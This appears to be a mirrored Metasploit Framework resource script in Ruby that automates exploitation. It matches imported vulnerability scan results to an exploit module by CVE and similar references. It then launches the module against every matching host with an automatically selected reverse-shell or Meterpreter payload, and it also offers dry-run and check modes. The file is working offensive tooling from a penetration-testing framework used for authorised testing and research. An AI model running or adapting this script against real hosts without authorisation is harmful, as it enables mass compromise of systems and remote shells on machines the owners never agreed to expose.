mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
264 lines
6.4 KiB
Plaintext
264 lines
6.4 KiB
Plaintext
<ruby>
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#
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# Print the help function
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#
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def help_me
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help = %Q|
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Description:
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This Metasploit RC file can be used to automate the exploitation process. Before using the
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script, you must import your vulnerability results to Metasploit so that it can deploy the
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module based on matching references. Three modes are available: exploit/dry/and check.
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In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
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suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
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all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
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function found in the module. If no mode is specified, then it'll default to 'exploit'.
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Usage:
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./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
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Arguments:
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rc_path - Full path to the RC script
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db_user - Username for MSF database (datastore: 'DB_USER')
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db_pass - Password for MSF database (datastore: 'DB_PASS')
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db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
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module_path - Path to the exploit (datastore: 'MODULE')
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mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
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Example of running an exploit:
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msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
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Authors:
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sinn3r <sinn3r[at]metasploit.com>
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m-1-k-3 <m1k3[at]s3cur1ty.de>
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help = help.gsub(/^\t/, '')
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print_line(help)
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end
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#
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# Load an exploit
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#
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def load_exploit(path)
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framework.exploits.create(path)
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end
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#
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# See if there is a match for the exploit
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#
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def ref_has_match(vuln_refs, exp_refs)
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# exp_refs is an array of URLs
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# vuln_refs is a collection of Mdm::Ref, with 'name' being the most useful info
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# (may contain a link)
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vuln_refs.each do |ref|
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n = ref.name
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n = n.gsub(/^CVE\-/, '')
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n = n.gsub(/^OSVDB\-/, '')
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n = n.gsub(/^MSB\-/, '')
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n = n.gsub(/^EDB-/, '')
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exp_refs.each { |e| return true if e.to_s =~ /#{n}/ }
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end
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return false
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end
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#
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# Automatically select a payload in this order:
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# Windows meterpreter, linux, osx, php, java, generic
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#
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def select_payload(exploit)
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windows = 'windows/meterpreter/reverse_tcp'
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linux = 'linux/x86/reverse_tcp'
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osx = 'osx/x86/shell_reverse_tcp'
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php = 'php/meterpreter_reverse_tcp'
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multi = 'java/meterpreter/reverse_tcp'
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generic = 'generic/shell_reverse_tcp'
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payloads = []
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exploit.compatible_payloads.each do |p|
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payloads << p[0]
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end
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if payloads.include?(windows)
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return windows
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elsif payloads.include?(linux)
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return linux
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elsif payloads.include?(php)
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return php
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elsif payloads.include?(multi)
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return multi
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elsif payloads.include?(generic)
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return generic
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else
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# WTF? This exploit supports NONE of our favorite payloads?
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# What kinda BS is this?
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return nil
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end
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end
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#
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# Connect to the database
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#
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def init_db(username, password, workspace)
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if username.empty? or password.empty?
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raise ArgumentError, "You must have a credential to connect to your database"
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end
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print_status("Connecting to database: #{workspace}")
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run_single("db_connect #{username}:#{password}@localhost:5432/#{workspace}")
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end
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#
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# Exploit mode
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#
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def auto_exploit(module_path)
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exploit = load_exploit(module_path)
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raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
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exploit_refs = exploit.references
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get_payload = select_payload(exploit)
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lhost = Rex::Socket.source_address('50.50.50.50')
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if get_payload.nil?
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raise RuntimeError, "No payload selected for this exploit"
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else
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print_status("Payload selected: #{get_payload} (lhost=#{lhost})")
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end
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framework.db.workspace.vulns.each do |vuln|
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next if not ref_has_match(vuln.refs, exploit_refs)
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print_good("Using #{exploit.shortname} against host #{vuln.host.address.to_s}")
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run_single("use #{exploit.fullname}")
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run_single("set RHOST #{vuln.host.address.to_s}")
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run_single("set payload #{get_payload}")
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run_single("set lhost #{lhost}")
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run_single("exploit -z")
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select(nil, nil, nil, 1)
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run_single("back")
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end
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end
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#
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# Dry-run mode
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#
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def dry_run(module_path)
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exploit = load_exploit(module_path)
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raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
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exploit_refs = exploit.references
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framework.db.workspace.vulns.each do |vuln|
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next if not ref_has_match(vuln.refs, exploit_refs)
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addr = vuln.host.address.to_s
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print_good("#{addr} has a matching reference to #{exploit.shortname}")
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end
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end
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#
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# Check mode
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#
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def check_exploit(module_path)
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exploit = load_exploit(module_path)
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raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
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exploit_refs = exploit.references
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framework.db.workspace.vulns.each do |vuln|
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next if not ref_has_match(vuln.refs, exploit_refs)
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print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
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run_single("use #{exploit.fullname}")
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run_single("set RHOST #{vuln.host.address.to_s}")
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run_single("check")
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select(nil, nil, nil, 1)
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run_single("back")
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print_line()
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end
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end
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#
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# See if we're already connected
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#
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def is_db_connected?
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begin
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framework.db.hosts
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return true
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rescue ::ActiveRecord::ConnectionNotEstablished
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return false
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end
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end
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#
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# Initialize our arguments
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#
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def init_args
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args = {}
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if ARGV.join('') =~ /^help$/i
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args[:help] = true
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return args
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end
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datastore = framework.datastore
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args[:db_user] = ARGV.shift || datastore['DB_USER'] || ''
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args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
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args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
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args[:module] = ARGV.shift || datastore['MODULE'] || ''
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args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
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raise ArgumentError, "Missing a module path" if args[:module].empty?
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return args
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end
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#
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# Code below serves as our "main" code.
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# We chose not to wrap it around in a run() function, because if
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# we do, any "return" will exit msfconsole, and we don't actually want that
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# to happen.
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#
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begin
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args = init_args
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if args[:help]
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help_me
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return
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else
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if not is_db_connected?
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init_db(args[:db_user], args[:db_pass], args[:db_workspace])
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end
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end
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case args[:mode]
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when /^exploit$/i
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auto_exploit(args[:module])
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when /^dry$/i
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dry_run(args[:module])
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when /^check$/i
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check_exploit(args[:module])
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else
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raise ArgumentError, "Invalid mode"
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end
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rescue ArgumentError => e
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print_error("Invalid argument: #{e.message}")
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return
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rescue RuntimeError => e
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print_error(e.message)
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return
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rescue ::Exception => e
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raise e
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end
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</ruby>
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